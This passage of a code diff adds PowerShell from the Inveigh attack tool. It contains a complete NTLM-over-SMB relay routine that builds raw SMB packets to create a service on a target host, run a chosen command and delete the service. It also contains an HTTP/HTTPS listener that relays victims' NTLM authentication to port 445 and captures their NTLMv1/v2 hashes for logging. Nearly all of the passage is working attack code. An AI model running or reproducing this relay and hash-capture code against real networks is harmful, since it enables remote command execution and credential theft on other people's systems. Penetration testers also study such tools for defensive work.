+        $SMB_service_byte_count_bytes = [System.BitConverter]::GetBytes($SMB_relay_command_bytes.Length + $SMB_service_bytes.Length + 174)
+        $SMB_service_byte_count_bytes = $SMB_service_byte_count_bytes[0..1]   
+        $SMB_relay_command_length_bytes = [System.BitConverter]::GetBytes($SMB_relay_command_bytes.Length / 2)
+        $k = 0
+
+        :SMB_relay_execute_loop while ($k -lt 12)
+        {
+
+            switch ($k)
+            {
+            
+                0
+                {
+                    $SMB_relay_execute_send = 0x00,0x00,0x00,0x45,0xff,0x53,0x4d,0x42,0x75,0x00,0x00,0x00,0x00,
+                                                0x18,0x01,0x48,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
+                                                0x00,0x00,0xff,0xff +
+                                                $inveigh.process_ID_bytes +
+                                                $SMB_user_ID +
+                                                0x00,0x00,0x04,0xff,0x00,0x00,0x00,0x00,0x00,0x01,0x00,0x1a,0x00,
+                                                0x00,0x5c,0x5c,0x31,0x30,0x2e,0x31,0x30,0x2e,0x32,0x2e,0x31,0x30,
+                                                0x32,0x5c,0x49,0x50,0x43,0x24,0x00,0x3f,0x3f,0x3f,0x3f,0x3f,0x00
+                }
+                  
+                1
+                {
+                    $SMB_relay_execute_send = 0x00,0x00,0x00,0x5b,0xff,0x53,0x4d,0x42,0xa2,0x00,0x00,0x00,0x00,
+                                                0x18,0x02,0x28,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
+                                                0x00,0x00,0x00,0x08 +
+                                                $inveigh.process_ID_bytes +
+                                                $SMB_user_ID +
+                                                0x03,0x00,0x18,0xff,0x00,0x00,0x00,0x00,0x07,0x00,0x16,0x00,0x00,
+                                                0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x02,0x00,0x00,0x00,0x00,
+                                                0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x07,0x00,0x00,0x00,0x01,
+                                                0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x02,0x00,0x00,0x00,0x00,0x08,
+                                                0x00,0x5c,0x73,0x76,0x63,0x63,0x74,0x6c,0x00
+                }
+                
+                2
+                {
+                    $SMB_relay_execute_send = 0x00,0x00,0x00,0x87,0xff,0x53,0x4d,0x42,0x2f,0x00,0x00,0x00,0x00,
+                                                0x18,0x05,0x28,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
+                                                0x00,0x00,0x00,0x08 +
+                                                $inveigh.process_ID_bytes +
+                                                $SMB_user_ID +
+                                                0x04,0x00,0x0e,0xff,0x00,0x00,0x00,0x00,0x40,0xea,0x03,0x00,0x00,
+                                                0xff,0xff,0xff,0xff,0x08,0x00,0x48,0x00,0x00,0x00,0x48,0x00,0x3f,
+                                                0x00,0x00,0x00,0x00,0x00,0x48,0x00,0x05,0x00,0x0b,0x03,0x10,0x00,
+                                                0x00,0x00,0x48,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0xd0,0x16,0xd0,
+                                                0x16,0x00,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x00,0x00,0x01,0x00,
+                                                0x81,0xbb,0x7a,0x36,0x44,0x98,0xf1,0x35,0xad,0x32,0x98,0xf0,0x38,
+                                                0x00,0x10,0x03,0x02,0x00,0x00,0x00,0x04,0x5d,0x88,0x8a,0xeb,0x1c,
+                                                0xc9,0x11,0x9f,0xe8,0x08,0x00,0x2b,0x10,0x48,0x60,0x02,0x00,0x00,
+                                                0x00
+                        
+                    $SMB_multiplex_id = 0x05
+                }
+               
+                3
+                { 
+                    $SMB_relay_execute_send = $SMB_relay_execute_ReadAndRequest
+                }
+                
+                4
+                {
+                    $SMB_relay_execute_send = 0x00,0x00,0x00,0x9b,0xff,0x53,0x4d,0x42,0x2f,0x00,0x00,0x00,0x00,
+                                                0x18,0x05,0x28,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
+                                                0x00,0x00,0x00,0x08 +
+                                                $inveigh.process_ID_bytes +
+                                                $SMB_user_ID +
+                                                0x06,0x00,0x0e,0xff,0x00,0x00,0x00,0x00,0x40,0xea,0x03,0x00,0x00,
+                                                0xff,0xff,0xff,0xff,0x08,0x00,0x50,0x00,0x00,0x00,0x5c,0x00,0x3f,
+                                                0x00,0x00,0x00,0x00,0x00,0x5c,0x00,0x05,0x00,0x00,0x03,0x10,0x00,
+                                                0x00,0x00,0x5c,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x38,0x00,0x00,
+                                                0x00,0x00,0x00,0x0f,0x00,0x00,0x00,0x03,0x00,0x15,0x00,0x00,0x00,
+                                                0x00,0x00,0x00,0x00,0x15,0x00,0x00,0x00 +
+                                                $SMB_service_bytes +
+                                                0x00,0x00,0x00,0x00,0x00,0x00,0x3f,0x00,0x0f,0x00
+                        
+                    $SMB_multiplex_id = 0x07
+                }
+                
+                5
+                {  
+                    $SMB_relay_execute_send = $SMB_relay_execute_ReadAndRequest
+                }
+                
+                6
+                {
+                    $SMB_relay_execute_send = [Array]0x00 +
+                                                $SMB_service_data_length_bytes +
+                                                0xff,0x53,0x4d,0x42,0x2f,0x00,0x00,0x00,0x00,0x18,0x05,0x28,0x00,
+                                                0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x08 +
+                                                $inveigh.process_ID_bytes +
+                                                $SMB_user_ID +
+                                                0x08,0x00,0x0e,0xff,0x00,0x00,0x00,0x00,0x40,0x00,0x00,0x00,0x00,
+                                                0xff,0xff,0xff,0xff,0x08,0x00 +
+                                                $SMB_service_byte_count_bytes +
+                                                0x00,0x00 +
+                                                $SMB_service_byte_count_bytes +
+                                                0x3f,0x00,0x00,0x00,0x00,0x00 +
+                                                $SMB_service_byte_count_bytes +
+                                                0x05,0x00,0x00,0x03,0x10,0x00,0x00,0x00 +
+                                                $SMB_service_byte_count_bytes +
+                                                0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x0c,
+                                                0x00 +
+                                                $SMB_context_handler +
+                                                0x15,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x15,0x00,0x00,0x00 +
+                                                $SMB_service_bytes +
+                                                0x00,0x00 +
+                                                $SMB_referent_ID_bytes +
+                                                0x15,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x15,0x00,0x00,0x00 +
+                                                $SMB_service_bytes +
+                                                0x00,0x00,0xff,0x01,0x0f,0x00,0x10,0x01,0x00,0x00,0x03,0x00,0x00,
+                                                0x00,0x00,0x00,0x00,0x00 +
+                                                $SMB_relay_command_length_bytes +
+                                                0x00,0x00,0x00,0x00 +
+                                                $SMB_relay_command_length_bytes +
+                                                $SMB_relay_command_bytes +
+                                                0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
+                                                0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
+                                                0x00,0x00
+                        
+                    $SMB_multiplex_id = 0x09
+                }
+
+                7
+                {
+                    $SMB_relay_execute_send = $SMB_relay_execute_ReadAndRequest
+                }
+
+                
+                8
+                {
+                    $SMB_relay_execute_send = 0x00,0x00,0x00,0x73,0xff,0x53,0x4d,0x42,0x2f,0x00,0x00,0x00,0x00,
+                                                0x18,0x05,0x28,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
+                                                0x00,0x00,0x00,0x08 +
+                                                $inveigh.process_ID_bytes +
+                                                $SMB_user_ID +
+                                                0x0a,0x00,0x0e,0xff,0x00,0x00,0x00,0x00,0x40,0x00,0x00,0x00,0x00,
+                                                0xff,0xff,0xff,0xff,0x08,0x00,0x34,0x00,0x00,0x00,0x34,0x00,0x3f,
+                                                0x00,0x00,0x00,0x00,0x00,0x34,0x00,0x05,0x00,0x00,0x03,0x10,0x00,
+                                                0x00,0x00,0x34,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x1c,0x00,0x00,
+                                                0x00,0x00,0x00,0x13,0x00 +
+                                                $SMB_context_handler +
+                                                0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00
+                }
+                
+                9
+                {
+                    $SMB_relay_execute_send = $SMB_relay_execute_ReadAndRequest
+                }
+                
+                10
+                { 
+                     $SMB_relay_execute_send = 0x00,0x00,0x00,0x6b,0xff,0x53,0x4d,0x42,0x2f,0x00,0x00,0x00,0x00,
+                                                0x18,0x05,0x28,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
+                                                0x00,0x00,0x00,0x08 +
+                                                $inveigh.process_ID_bytes +
+                                                $SMB_user_ID +
+                                                0x0b,0x00,0x0e,0xff,0x00,0x00,0x00,0x00,0x40,0x0b,0x01,0x00,0x00,
+                                                0xff,0xff,0xff,0xff,0x08,0x00,0x2c,0x00,0x00,0x00,0x2c,0x00,0x3f,
+                                                0x00,0x00,0x00,0x00,0x00,0x2c,0x00,0x05,0x00,0x00,0x03,0x10,0x00,
+                                                0x00,0x00,0x2c,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x14,0x00,0x00,
+                                                0x00,0x00,0x00,0x02,0x00 +
+                                                $SMB_context_handler
+                }
+
+                11
+                {
+                     $SMB_relay_execute_send = $SMB_relay_execute_ReadAndRequest
+                }
+
+            }
+            
+            $SMB_relay_execute_stream.Write($SMB_relay_execute_send,0,$SMB_relay_execute_send.Length)
+            $SMB_relay_execute_stream.Flush()
+            
+            if($SMBRelayNetworkTimeout)
+            {
+                $SMB_relay_execute_timeout = New-TimeSpan -Seconds $SMBRelayNetworkTimeout
+                $SMB_relay_execute_stopwatch = [System.Diagnostics.Stopwatch]::StartNew()
+                
+                while(!$SMB_relay_execute_stream.DataAvailable)
+                {
+
+                    if($SMB_relay_execute_stopwatch.Elapsed -ge $SMB_relay_execute_timeout)
+                    {
+                        $inveigh.console_queue.Add("SMB relay target didn't respond within $SMBRelayNetworkTimeout seconds")
+                        $inveigh.log.Add($inveigh.log_file_queue[$inveigh.log_file_queue.Add("$(Get-Date -format 's') - SMB relay target didn't respond within $SMBRelayNetworkTimeout seconds")])
+                        $SMB_relay_failed = $true
+                        break SMB_relay_execute_loop
+                    }
+                
+                }
+            
+            }
+            
+            if ($k -eq 5) 
+            {
+                $SMB_relay_execute_stream.Read($SMB_relay_execute_bytes,0,$SMB_relay_execute_bytes.Length)
+                $SMB_context_handler = $SMB_relay_execute_bytes[88..107]
+
+                if([System.BitConverter]::ToString($SMB_relay_execute_bytes[108..111]) -eq '00-00-00-00' -and [System.BitConverter]::ToString($SMB_context_handler) -ne '00-00-00-00-00-00-00-00-00-00-00-00-00-00-00-00-00-00-00-00')
+                {
+                    $inveigh.console_queue.Add("$HTTP_NTLM_domain_string\$HTTP_NTLM_user_string is a local administrator on $SMBRelayTarget")
+                    $inveigh.log.Add($inveigh.log_file_queue[$inveigh.log_file_queue.Add("$(Get-Date -format 's') - $HTTP_NTLM_domain_string\$HTTP_NTLM_user_string is a local administrator on $SMBRelayTarget")])
+                }
+                elseif([System.BitConverter]::ToString($SMB_relay_execute_bytes[108..111]) -eq '05-00-00-00')
+                {
+                    $inveigh.console_queue.Add("$HTTP_NTLM_domain_string\$HTTP_NTLM_user_string is not a local administrator on $SMBRelayTarget")
+                    $inveigh.log.Add($inveigh.log_file_queue[$inveigh.log_file_queue.Add("$(Get-Date -format 's') - $HTTP_NTLM_domain_string\$HTTP_NTLM_user_string is not a local administrator on $SMBRelayTarget")])
+                    $inveigh.SMBRelay_failed_list.Add("$HTTP_NTLM_domain_string\$HTTP_NTLM_user_string $SMBRelayTarget")
+                    $SMB_relay_failed = $true
+                }
+                else
+                {
+                    $SMB_relay_failed = $true
+                }
+
+            }
+            elseif (($k -eq 7) -or ($k -eq 9) -or ($k -eq 11))
+            {
+                $SMB_relay_execute_stream.Read($SMB_relay_execute_bytes,0,$SMB_relay_execute_bytes.Length)
+
+                switch($k)
+                {
+
+                    7
+                    {
+                        $SMB_context_handler = $SMB_relay_execute_bytes[92..111]
+                        $SMB_relay_execute_error_message = "Service creation fault context mismatch"
+                    }
+
+                    11
+                    {
+                        $SMB_relay_execute_error_message = "Service start fault context mismatch"
+                    }
+
+                    13
+                    {
+                        $SMB_relay_execute_error_message = "Service deletion fault context mismatch"
+                    }
+
+                }
+                
+                if([System.BitConverter]::ToString($SMB_context_handler[0..3]) -ne '00-00-00-00')
+                {
+                    $SMB_relay_failed = $true
+                }
+
+                if([System.BitConverter]::ToString($SMB_relay_execute_bytes[88..91]) -eq '1a-00-00-1c')
+                {
+                    $inveigh.console_queue.Add("$SMB_relay_execute_error_message service on $SMBRelayTarget")
+                    $inveigh.log.Add($inveigh.log_file_queue[$inveigh.log_file_queue.Add("$(Get-Date -format 's') - $SMB_relay_execute_error on $SMBRelayTarget")])
+                    $SMB_relay_failed = $true
+                }
+
+            }        
+            else
+            {
+                $SMB_relay_execute_stream.Read($SMB_relay_execute_bytes,0,$SMB_relay_execute_bytes.Length)    
+            }
+            
+            if(!$SMB_relay_failed -and $k -eq 7)
+            {
+                $inveigh.console_queue.Add("SMB relay service $SMB_service created on $SMBRelayTarget")
+                $inveigh.log.Add($inveigh.log_file_queue[$inveigh.log_file_queue.Add("$(Get-Date -format 's') - SMB relay service $SMB_service created on $SMBRelayTarget")])
+            }
+            elseif((!$SMB_relay_failed) -and ($k -eq 9))
+            {
+                $inveigh.console_queue.Add("SMB relay command likely executed on $SMBRelayTarget")
+                $inveigh.log.Add($inveigh.log_file_queue[$inveigh.log_file_queue.Add("$(Get-Date -format 's') - SMB relay command likely executed on $SMBRelayTarget")])
+            
+                if($SMBRelayAutoDisable -eq 'Y')
+                {
+                    $inveigh.SMB_relay = $false
+                    $inveigh.console_queue.Add("SMB relay auto disabled due to success")
+                    $inveigh.log.Add($inveigh.log_file_queue[$inveigh.log_file_queue.Add("$(Get-Date -format 's') - SMB relay auto disabled due to success")])
+                }
+
+            }
+            elseif(!$SMB_relay_failed -and $k -eq 11)
+            {
+                $inveigh.console_queue.Add("SMB relay service $SMB_service deleted on $SMBRelayTarget")
+                $inveigh.log.Add($inveigh.log_file_queue[$inveigh.log_file_queue.Add("$(Get-Date -format 's') - SMB relay service $SMB_service deleted on $SMBRelayTarget")])
+            }   
+            
+            $SMB_relay_execute_ReadAndRequest = 0x00,0x00,0x00,0x37,0xff,0x53,0x4d,0x42,0x2e,0x00,0x00,0x00,0x00,
+                                                0x18,0x05,0x28,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
+                                                0x00,0x00,0x00,0x08 +
+                                                $inveigh.process_ID_bytes +
+                                                $SMB_user_ID +
+                                                $SMB_multiplex_ID +
+                                                0x00,0x0a,0xff,0x00,0x00,0x00,0x00,0x40,0x00,0x00,0x00,0x00,0x58,
+                                                0x02,0x58,0x02,0xff,0xff,0xff,0xff,0x00,0x00,0x00,0x00
+            
+            if($SMB_relay_failed)
+            {
+                $inveigh.console_queue.Add("SMB relay failed on $SMBRelayTarget")
+                $inveigh.log.Add($inveigh.log_file_queue[$inveigh.log_file_queue.Add("$(Get-Date -format 's') - SMB relay failed on $SMBRelayTarget")])
+                BREAK SMB_relay_execute_loop
+            }
+
+            $k++
+        }
+        
+        $inveigh.SMB_relay_active_step = 0
+        $SMB_relay_socket.Close()
+    }
+
+}
+
+# HTTP/HTTPS Server ScriptBlock - HTTP/HTTPS listener
+$HTTP_scriptblock = 
+{ 
+    param ($Challenge,$SMBRelayTarget,$SMBRelayCommand,$SMBRelayUsernames,$SMBRelayAutoDisable,$SMBRelayNetworkTimeout,$WPADAuth)
+
+    function NTLMChallengeBase64
+    {
+        param ([String]$Challenge)
+
+        $HTTP_timestamp = Get-Date
+        $HTTP_timestamp = $HTTP_timestamp.ToFileTime()
+        $HTTP_timestamp = [System.BitConverter]::ToString([System.BitConverter]::GetBytes($HTTP_timestamp))
+        $HTTP_timestamp = $HTTP_timestamp.Split("-") | ForEach-Object{[Char][System.Convert]::ToInt16($_,16)}
+
+        if($Challenge)
+        {
+            $HTTP_challenge = $Challenge
+            $HTTP_challenge_bytes = $HTTP_challenge.Insert(2,'-').Insert(5,'-').Insert(8,'-').Insert(11,'-').Insert(14,'-').Insert(17,'-').Insert(20,'-')
+            $HTTP_challenge_bytes = $HTTP_challenge_bytes.Split("-") | ForEach-Object{[Char][System.Convert]::ToInt16($_,16)}
+        }
+        else
+        {
+            $HTTP_challenge_bytes = [String](1..8 | ForEach-Object{"{0:X2}" -f (Get-Random -Minimum 1 -Maximum 255)})
+            $HTTP_challenge = $HTTP_challenge_bytes -replace ' ',''
+            $HTTP_challenge_bytes = $HTTP_challenge_bytes.Split(" ") | ForEach-Object{[Char][System.Convert]::ToInt16($_,16)}
+        }
+
+        $inveigh.HTTP_challenge_queue.Add($inveigh.request.RemoteEndpoint.Address.IPAddressToString + $inveigh.request.RemoteEndpoint.Port + ',' + $HTTP_challenge)  > $null
+
+        $HTTP_NTLM_bytes = 0x4e,0x54,0x4c,0x4d,0x53,0x53,0x50,0x00,0x02,0x00,0x00,0x00,0x06,0x00,0x06,0x00,0x38,
+                            0x00,0x00,0x00,0x05,0x82,0x89,0xa2 +
+                            $HTTP_challenge_bytes +
+                            0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x82,0x00,0x82,0x00,0x3e,0x00,0x00,0x00,0x06,
+                            0x01,0xb1,0x1d,0x00,0x00,0x00,0x0f,0x4c,0x00,0x41,0x00,0x42,0x00,0x02,0x00,0x06,0x00,
+                            0x4c,0x00,0x41,0x00,0x42,0x00,0x01,0x00,0x10,0x00,0x48,0x00,0x4f,0x00,0x53,0x00,0x54,
+                            0x00,0x4e,0x00,0x41,0x00,0x4d,0x00,0x45,0x00,0x04,0x00,0x12,0x00,0x6c,0x00,0x61,0x00,
+                            0x62,0x00,0x2e,0x00,0x6c,0x00,0x6f,0x00,0x63,0x00,0x61,0x00,0x6c,0x00,0x03,0x00,0x24,
+                            0x00,0x68,0x00,0x6f,0x00,0x73,0x00,0x74,0x00,0x6e,0x00,0x61,0x00,0x6d,0x00,0x65,0x00,
+                            0x2e,0x00,0x6c,0x00,0x61,0x00,0x62,0x00,0x2e,0x00,0x6c,0x00,0x6f,0x00,0x63,0x00,0x61,
+                            0x00,0x6c,0x00,0x05,0x00,0x12,0x00,0x6c,0x00,0x61,0x00,0x62,0x00,0x2e,0x00,0x6c,0x00,
+                            0x6f,0x00,0x63,0x00,0x61,0x00,0x6c,0x00,0x07,0x00,0x08,0x00 +
+                            $HTTP_timestamp +
+                            0x00,0x00,0x00,0x00,0x0a,0x0a
+
+        $NTLM_challenge_base64 = [System.Convert]::ToBase64String($HTTP_NTLM_bytes)
+        $NTLM = 'NTLM ' + $NTLM_challenge_base64
+        $NTLM_challenge = $HTTP_challenge
+
+        return $NTLM
+
+    }
+    
+    while ($inveigh.relay_running)
+    {
+        $inveigh.context = $inveigh.HTTP_listener.GetContext() 
+        $inveigh.request = $inveigh.context.Request
+        $inveigh.response = $inveigh.context.Response
+        $inveigh.message = ''    
+        $NTLM = 'NTLM'
+        
+        if($inveigh.request.IsSecureConnection)
+        {
+            $HTTP_type = "HTTPS"
+        }
+        else
+        {
+            $HTTP_type = "HTTP"
+        }
+        
+        if ($inveigh.request.RawUrl -match '/wpad.dat' -and $WPADAuth -eq 'Anonymous')
+        {
+            $inveigh.response.StatusCode = 200
+        }
+        else
+        {
+            $inveigh.response.StatusCode = 401
+        }
+
+        $HTTP_request_time = Get-Date -format 's'
+
+        if($HTTP_request_time -eq $HTTP_request_time_old -and $inveigh.request.RawUrl -eq $HTTP_request_raw_url_old -and $inveigh.request.RemoteEndpoint.Address -eq $HTTP_request_remote_endpoint_old)
+        {
+            $HTTP_raw_url_output = $false
+        }
+        else
+        {
+            $HTTP_raw_url_output = $true
+        }
+
+        if(!$inveigh.request.headers["Authorization"] -and $inveigh.HTTP_listener.IsListening -and $HTTP_raw_url_output)
+        {
+            $inveigh.console_queue.Add("$HTTP_request_time - $HTTP_type request for " + $inveigh.request.RawUrl + " received from " + $inveigh.request.RemoteEndpoint.Address)
+            $inveigh.log.Add($inveigh.log_file_queue[$inveigh.log_file_queue.Add("$HTTP_request_time - $HTTP_type request for " + $inveigh.request.RawUrl + " received from " + $inveigh.request.RemoteEndpoint.Address)])
+        }
+
+        $HTTP_request_raw_url_old = $inveigh.request.RawUrl
+        $HTTP_request_remote_endpoint_old = $inveigh.request.RemoteEndpoint.Address
+        $HTTP_request_time_old = $HTTP_request_time
+            
+        [String] $authentication_header = $inveigh.request.headers.getvalues('Authorization')
+        
+        if($authentication_header.startswith('NTLM '))
+        {
+            $authentication_header = $authentication_header -replace 'NTLM ',''
+            [Byte[]] $HTTP_request_bytes = [System.Convert]::FromBase64String($authentication_header)
+            $inveigh.response.StatusCode = 401
+            
+            if ($HTTP_request_bytes[8] -eq 1)
+            {
+
+                if($inveigh.SMB_relay -and $inveigh.SMB_relay_active_step -eq 0 -and $inveigh.request.RemoteEndpoint.Address -ne $SMBRelayTarget)
+                {
+                    $inveigh.SMB_relay_active_step = 1
+                    $inveigh.console_queue.Add("$HTTP_type to SMB relay triggered by " + $inveigh.request.RemoteEndpoint.Address + " at $(Get-Date -format 's')")
+                    $inveigh.log.Add($inveigh.log_file_queue[$inveigh.log_file_queue.Add("$(Get-Date -format 's') - $HTTP_type to SMB relay triggered by " + $inveigh.request.RemoteEndpoint.Address)])
+                    $inveigh.console_queue.Add("Grabbing challenge for relay from $SMBRelayTarget")
+                    $inveigh.log.Add($inveigh.log_file_queue[$inveigh.log_file_queue.Add("$(Get-Date -format 's') - Grabbing challenge for relay from " + $SMBRelayTarget)])
+                    $SMB_relay_socket = New-Object System.Net.Sockets.TCPClient
+                    $SMB_relay_socket.Connect($SMBRelayTarget,"445")
+                    
+                    if(!$SMB_relay_socket.connected)
+                    {
+                        $inveigh.console_queue.Add("$(Get-Date -format 's') - SMB relay target is not responding")
+                        $inveigh.log.Add($inveigh.log_file_queue[$inveigh.log_file_queue.Add("$(Get-Date -format 's') - SMB relay target is not responding")])
+                        $inveigh.SMB_relay_active_step = 0
+                    }
+                    
+                    if($inveigh.SMB_relay_active_step -eq 1)
+                    {
+                        $SMB_relay_bytes = SMBRelayChallenge $SMB_relay_socket $HTTP_request_bytes
+                        $inveigh.SMB_relay_active_step = 2
+                        $SMB_relay_bytes = $SMB_relay_bytes[2..$SMB_relay_bytes.Length]
+                        $SMB_user_ID = $SMB_relay_bytes[34..33]
+                        $SMB_relay_NTLMSSP = [System.BitConverter]::ToString($SMB_relay_bytes)
+                        $SMB_relay_NTLMSSP = $SMB_relay_NTLMSSP -replace "-",""
+                        $SMB_relay_NTLMSSP_index = $SMB_relay_NTLMSSP.IndexOf("4E544C4D53535000")
+                        $SMB_relay_NTLMSSP_bytes_index = $SMB_relay_NTLMSSP_index / 2
+                        $SMB_domain_length = DataLength2 ($SMB_relay_NTLMSSP_bytes_index + 12) $SMB_relay_bytes
+                        $SMB_domain_length_offset_bytes = $SMB_relay_bytes[($SMB_relay_NTLMSSP_bytes_index + 12)..($SMB_relay_NTLMSSP_bytes_index + 19)]
+                        $SMB_target_length = DataLength2 ($SMB_relay_NTLMSSP_bytes_index + 40) $SMB_relay_bytes
+                        $SMB_target_length_offset_bytes = $SMB_relay_bytes[($SMB_relay_NTLMSSP_bytes_index + 40)..($SMB_relay_NTLMSSP_bytes_index + 55 + $SMB_domain_length)]
+                        $SMB_relay_NTLM_challenge = $SMB_relay_bytes[($SMB_relay_NTLMSSP_bytes_index + 24)..($SMB_relay_NTLMSSP_bytes_index + 31)]
+                        $SMB_relay_target_details = $SMB_relay_bytes[($SMB_relay_NTLMSSP_bytes_index + 56 + $SMB_domain_length)..($SMB_relay_NTLMSSP_bytes_index + 55 + $SMB_domain_length + $SMB_target_length)]
+                    
+                        $HTTP_NTLM_bytes = 0x4e,0x54,0x4c,0x4d,0x53,0x53,0x50,0x00,0x02,0x00,0x00,0x00 +
+                                           $SMB_domain_length_offset_bytes +
+                                           0x05,0x82,0x89,0xa2 +
+                                           $SMB_relay_NTLM_challenge +
+                                           0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00 +
+                                           $SMB_target_length_offset_bytes +
+                                           $SMB_relay_target_details
+                    
+                        $NTLM_challenge_base64 = [System.Convert]::ToBase64String($HTTP_NTLM_bytes)
+                        $NTLM = 'NTLM ' + $NTLM_challenge_base64
+                        $NTLM_challenge = SMBNTLMChallenge $SMB_relay_bytes
+                        $inveigh.HTTP_challenge_queue.Add($inveigh.request.RemoteEndpoint.Address.IPAddressToString + $inveigh.request.RemoteEndpoint.Port + ',' + $NTLM_challenge)
+                        $inveigh.console_queue.Add("Received challenge $NTLM_challenge for relay from $SMBRelayTarget")
+                        $inveigh.log.Add($inveigh.log_file_queue[$inveigh.log_file_queue.Add("$(Get-Date -format 's') - Received challenge $NTLM_challenge for relay from $SMBRelayTarget")])
+                        $inveigh.console_queue.Add("Providing challenge $NTLM_challenge for relay to " + $inveigh.request.RemoteEndpoint.Address)
+                        $inveigh.log.Add($inveigh.log_file_queue[$inveigh.log_file_queue.Add("$(Get-Date -format 's') - Providing challenge $NTLM_challenge for relay to " + $inveigh.request.RemoteEndpoint.Address)])
+                        $inveigh.SMB_relay_active_step = 3
+                    }
+                    else
+                    {
+                        $NTLM = NTLMChallengeBase64 $Challenge
+                    }
+
+                }
+                else
+                {
+                     $NTLM = NTLMChallengeBase64 $Challenge
+                }
+                
+                $inveigh.response.StatusCode = 401
+            }
+            elseif ($HTTP_request_bytes[8] -eq 3)
+            {
+                $NTLM = 'NTLM'
+                $HTTP_NTLM_length = DataLength2 20 $HTTP_request_bytes
+                $HTTP_NTLM_offset = DataLength4 24 $HTTP_request_bytes
+                $HTTP_NTLM_domain_length = DataLength2 28 $HTTP_request_bytes
+                $HTTP_NTLM_domain_offset = DataLength4 32 $HTTP_request_bytes
+                [String] $NTLM_challenge = $inveigh.HTTP_challenge_queue -like $inveigh.request.RemoteEndpoint.Address.IPAddressToString + $inveigh.request.RemoteEndpoint.Port + '*'
+                $inveigh.HTTP_challenge_queue.Remove($NTLM_challenge)
+                $NTLM_challenge = $NTLM_challenge.Substring(($NTLM_challenge.IndexOf(",")) + 1)
+                       
+                if($HTTP_NTLM_domain_length -eq 0)
+                {
+                    $HTTP_NTLM_domain_string = ''
+                }
+                else
+                {  
+                    $HTTP_NTLM_domain_string = DataToString $HTTP_NTLM_domain_offset $HTTP_NTLM_domain_length $HTTP_request_bytes
+                } 
+                    
+                $HTTP_NTLM_user_length = DataLength2 36 $HTTP_request_bytes
+                $HTTP_NTLM_user_offset = DataLength4 40 $HTTP_request_bytes
+                $HTTP_NTLM_user_string = DataToString $HTTP_NTLM_user_offset $HTTP_NTLM_user_length $HTTP_request_bytes
+                $HTTP_NTLM_host_length = DataLength2 44 $HTTP_request_bytes
+                $HTTP_NTLM_host_offset = DataLength4 48 $HTTP_request_bytes
+                $HTTP_NTLM_host_string = DataToString $HTTP_NTLM_host_offset $HTTP_NTLM_host_length $HTTP_request_bytes
+        
+                if($HTTP_NTLM_length -eq 24) # NTLMv1
+                {
+                    $NTLM_type = "NTLMv1"
+                    $NTLM_response = [System.BitConverter]::ToString($HTTP_request_bytes[($HTTP_NTLM_offset - 24)..($HTTP_NTLM_offset + $HTTP_NTLM_length)]) -replace "-",""
+                    $NTLM_response = $NTLM_response.Insert(48,':')
+                    $inveigh.HTTP_NTLM_hash = $HTTP_NTLM_user_string + "::" + $HTTP_NTLM_domain_string + ":" + $NTLM_response + ":" + $NTLM_challenge
+                    
+                    if($NTLM_challenge -and $NTLM_response -and ($inveigh.machine_accounts -or (!$inveigh.machine_accounts -and -not $HTTP_NTLM_user_string.EndsWith('$'))))
+                    {    
+                        $inveigh.log.Add($inveigh.log_file_queue[$inveigh.log_file_queue.Add("$(Get-Date -format 's') - $HTTP_type NTLMv1 challenge/response for $HTTP_NTLM_domain_string\$HTTP_NTLM_user_string captured from " + $inveigh.request.RemoteEndpoint.Address + "(" + $HTTP_NTLM_host_string + ")")])
+                        $inveigh.NTLMv1_file_queue.Add($inveigh.HTTP_NTLM_hash)
+                        $inveigh.NTLMv1_list.Add($inveigh.HTTP_NTLM_hash)
+                        $inveigh.console_queue.Add("$(Get-Date -format 's') - $HTTP_type NTLMv1 challenge/response captured from " + $inveigh.request.RemoteEndpoint.Address + "(" + $HTTP_NTLM_host_string + "):`n" + $inveigh.HTTP_NTLM_hash)
+                        
+                        if($inveigh.file_output)
+                        {
+                            $inveigh.console_queue.Add("$HTTP_type NTLMv1 challenge/response written to " + $inveigh.NTLMv1_out_file)
+                        }
+
+                    }
+                    
+                    if($inveigh.IP_capture_list -notcontains $inveigh.request.RemoteEndpoint.Address -and -not $HTTP_NTLM_user_string.EndsWith('$') -and !$inveigh.spoofer_repeat)
+                    {
+                        $inveigh.IP_capture_list.Add($source_IP.IPAddressToString)
+                    }
+
+                }
+                else # NTLMv2
+                {   
+                    $NTLM_type = "NTLMv2"           
+                    $NTLM_response = [System.BitConverter]::ToString($HTTP_request_bytes[$HTTP_NTLM_offset..($HTTP_NTLM_offset + $HTTP_NTLM_length)]) -replace "-",""
+                    $NTLM_response = $NTLM_response.Insert(32,':')
+                    $inveigh.HTTP_NTLM_hash = $HTTP_NTLM_user_string + "::" + $HTTP_NTLM_domain_string + ":" + $NTLM_challenge + ":" + $NTLM_response
+                    
+                    if($NTLM_challenge -and $NTLM_response -and ($inveigh.machine_accounts -or (!$inveigh.machine_accounts -and -not $HTTP_NTLM_user_string.EndsWith('$'))))
+                    {
